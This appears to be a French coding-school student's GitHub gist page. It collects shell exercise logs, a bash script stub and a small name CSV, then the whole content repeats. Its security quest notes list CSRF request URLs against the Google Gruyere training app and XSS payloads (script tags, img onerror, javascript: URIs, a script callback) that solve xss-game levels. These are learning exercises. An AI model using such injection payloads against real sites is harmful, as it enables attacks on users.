roulietta Hullaballo2001

## gist:8c7c11069dedbe7ca677a50a67953087

rouli@ROULIETTA-C3AMNNUF MINGW64 ~/quests/shell
$ curl -L -o planets.zip "https://github.com/WildCodeSchool/quests-ressources/blob/master/terminal/planets.zip?raw=true"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  203k    0  203k    0     0   394k      0 --:--:-- --:--:-- --:--:--  395k

rouli@ROULIETTA-C3AMNNUF MINGW64 ~/quests/shell
$ unzip plants.zip
unzip:  cannot find or open plants.zip, plants.zip.zip or plants.zip.ZIP.

## gist:e406c3522d245e7d93581682481c3165
rouli@ROULIETTA-C3AMNNUF MINGW64 ~
$ ls
'3D Objects'/         Dropbox/           Music/                                                                                         Recent@                   'Voisinage réseau'@
 AppData/             Favorites/         NTUSER.DAT                                                                                    'Saved Games'/              ntuser.dat.LOG1
'Application Data'@   Links/             NTUSER.DAT{739346ab-df92-11ea-835b-28cdc4bc09da}.TM.blf                                        Searches/                  ntuser.dat.LOG2
 Contacts/           'Local Settings'@   NTUSER.DAT{739346ab-df92-11ea-835b-28cdc4bc09da}.TMContainer00000000000000000001.regtrans-ms   SendTo@                    ntuser.ini
 Cookies@            'Menu Démarrer'@    NTUSER.DAT{739346ab-df92-11ea-835b-28cdc4bc09da}.TMContainer00000000000000000002.regtrans-ms   Videos/
 Documents/          'Mes documents'@    OneDrive/

## hello.sh
# Quel shell on utilise

#!/bin/bash

# Prompt username

read -p 'Quel est ton nom, étranger ?' -t 10 nom

# Si pas de reponse dans les 10 sec, on prend le $user

## $ javascript_biarritz_toulouse.csv
$ cat javascript_biarritz_toulouse.csv
Agathe,Bazin,Toulouse,France,2017,JavaScript
Maurice,Munoz,Toulouse,France,2017,JavaScript
Michèle,Traore,Toulouse,France,2017,JavaScript
Aurélie,Becker,Toulouse,France,2018,JavaScript
Timothée,Henry,Toulouse,France,2018,JavaScript
Théodore,Gerard,Toulouse,France,2018,JavaScript
Maryse,Allain,Toulouse,France,2018,JavaScript
Philippe,Paris,Toulouse,France,2018,JavaScript
Henri,Guilbert,Toulouse,France,2018,JavaScript

## gist:ddb0bb180e7d78539bffa071f86ec7fe
**find
$ find
.
./fictional
./fictional/arrakis.jpeg
./fictional/coruscant.jpeg
./fictional/cybertron.jpeg
./inhabited
./inhabited/arrakis.jpeg
./inhabited/coruscant.jpeg

## gist:698872f471646dfcf8f370903115713a
# Création d'un script de sauvegarde
#    - Le script demande quel dossier l'utilisateur souhaite sauvegarder
#    - Si le dossier n'existe pas, il affiche un message d'erreur
#    - Le script demande ou sauvegarder le fichier
#    - Le script demande la confirmation de sauvegarder à l'endroit choisit
#    - Le script affiche un message quand la sauvegarde est correctement effectué
#    - Le script demande si l'utilisateur veux sauvegarder un autre dossier
#


## Quête Sécurité 1.1 [Basics] Attaques CSRF : découvrir
Your Gruyere instance id is 620119290401856536461795748554137216491.
signup : rouletta/pass
https://google-gruyere.appspot.com/620119290401856536461795748554137216491/newaccount.gtl
https://google-gruyere.appspot.com/620119290401856536461795748554137216491/saveprofile?action=new&uid=roulietta&pw=pass&is_author=True  après le submit new account
https://google-gruyere.appspot.com/620119290401856536461795748554137216491/snippets.gtl    après création du snippet
https://google-gruyere.appspot.com/620119290401856536461795748554137216491/snippets.gtl#   après suppression du snipet + refresh
https://google-gruyere.appspot.com/620119290401856536461795748554137216491/deletesnippet?index=0  dans l'inspecteur qd on selectionne le X pour supprimer le snippet

## Quête Sécurité 1.2 [Basics] Attaques CSRF : prévenir
a
a
a
b
b
c
b
a
b

## Quête Sécurité 2.2 [Basics] Injections SQL : prévenir
b
b
b
b
b
a
b
a
c

## Quête Sécurité 3.1 [Basics] Attaques XSS : découvrir
dans le formulaire de recherche : <script>alert('hello')</script>
dans un post : <img src=x onerror="alert('Pop-up window via stored XSS');"
dans l'url : https://xss-game.appspot.com/level3/frame#3 >'>"><img src=x onerror=alert(0)>
dans le timer : ');alert(/xss 4/);('
dans email : javascript:alert("XSS") et dans l'url : https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('XSS')
dans l'url : https://xss-game.appspot.com/level6/frame#//google.com/jsapi?callback=alert

	rouli@ROULIETTA-C3AMNNUF MINGW64 ~/quests/shell
	$ curl -L -o planets.zip "https://github.com/WildCodeSchool/quests-ressources/blob/master/terminal/planets.zip?raw=true"
	% Total % Received % Xferd Average Speed Time Time Time Current
	Dload Upload Total Spent Left Speed
	100 203k 0 203k 0 0 394k 0 --:--:-- --:--:-- --:--:-- 395k

	rouli@ROULIETTA-C3AMNNUF MINGW64 ~/quests/shell
	$ unzip plants.zip
	unzip: cannot find or open plants.zip, plants.zip.zip or plants.zip.ZIP.
	rouli@ROULIETTA-C3AMNNUF MINGW64 ~
	$ ls
	'3D Objects'/ Dropbox/ Music/ Recent@ 'Voisinage réseau'@
	AppData/ Favorites/ NTUSER.DAT 'Saved Games'/ ntuser.dat.LOG1
	'Application Data'@ Links/ NTUSER.DAT{739346ab-df92-11ea-835b-28cdc4bc09da}.TM.blf Searches/ ntuser.dat.LOG2
	Contacts/ 'Local Settings'@ NTUSER.DAT{739346ab-df92-11ea-835b-28cdc4bc09da}.TMContainer00000000000000000001.regtrans-ms SendTo@ ntuser.ini
	Cookies@ 'Menu Démarrer'@ NTUSER.DAT{739346ab-df92-11ea-835b-28cdc4bc09da}.TMContainer00000000000000000002.regtrans-ms Videos/
	Documents/ 'Mes documents'@ OneDrive/
	# Quel shell on utilise

	#!/bin/bash

	# Prompt username

	read -p 'Quel est ton nom, étranger ?' -t 10 nom

	# Si pas de reponse dans les 10 sec, on prend le $user
	$ cat javascript_biarritz_toulouse.csv
	Agathe,Bazin,Toulouse,France,2017,JavaScript
	Maurice,Munoz,Toulouse,France,2017,JavaScript
	Michèle,Traore,Toulouse,France,2017,JavaScript
	Aurélie,Becker,Toulouse,France,2018,JavaScript
	Timothée,Henry,Toulouse,France,2018,JavaScript
	Théodore,Gerard,Toulouse,France,2018,JavaScript
	Maryse,Allain,Toulouse,France,2018,JavaScript
	Philippe,Paris,Toulouse,France,2018,JavaScript
	Henri,Guilbert,Toulouse,France,2018,JavaScript
	**find
	$ find
	.
	./fictional
	./fictional/arrakis.jpeg
	./fictional/coruscant.jpeg
	./fictional/cybertron.jpeg
	./inhabited
	./inhabited/arrakis.jpeg
	./inhabited/coruscant.jpeg
	# Création d'un script de sauvegarde
	# - Le script demande quel dossier l'utilisateur souhaite sauvegarder
	# - Si le dossier n'existe pas, il affiche un message d'erreur
	# - Le script demande ou sauvegarder le fichier
	# - Le script demande la confirmation de sauvegarder à l'endroit choisit
	# - Le script affiche un message quand la sauvegarde est correctement effectué
	# - Le script demande si l'utilisateur veux sauvegarder un autre dossier
	#
	Your Gruyere instance id is 620119290401856536461795748554137216491.
	signup : rouletta/pass
	https://google-gruyere.appspot.com/620119290401856536461795748554137216491/newaccount.gtl
	https://google-gruyere.appspot.com/620119290401856536461795748554137216491/saveprofile?action=new&uid=roulietta&pw=pass&is_author=True après le submit new account
	https://google-gruyere.appspot.com/620119290401856536461795748554137216491/snippets.gtl après création du snippet
	https://google-gruyere.appspot.com/620119290401856536461795748554137216491/snippets.gtl# après suppression du snipet + refresh
	https://google-gruyere.appspot.com/620119290401856536461795748554137216491/deletesnippet?index=0 dans l'inspecteur qd on selectionne le X pour supprimer le snippet
	dans le formulaire de recherche : <script>alert('hello')</script>
	dans un post : <img src=x onerror="alert('Pop-up window via stored XSS');"
	dans l'url : https://xss-game.appspot.com/level3/frame#3 >'>"><img src=x onerror=alert(0)>
	dans le timer : ');alert(/xss 4/);('
	dans email : javascript:alert("XSS") et dans l'url : https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('XSS')
	dans l'url : https://xss-game.appspot.com/level6/frame#//google.com/jsapi?callback=alert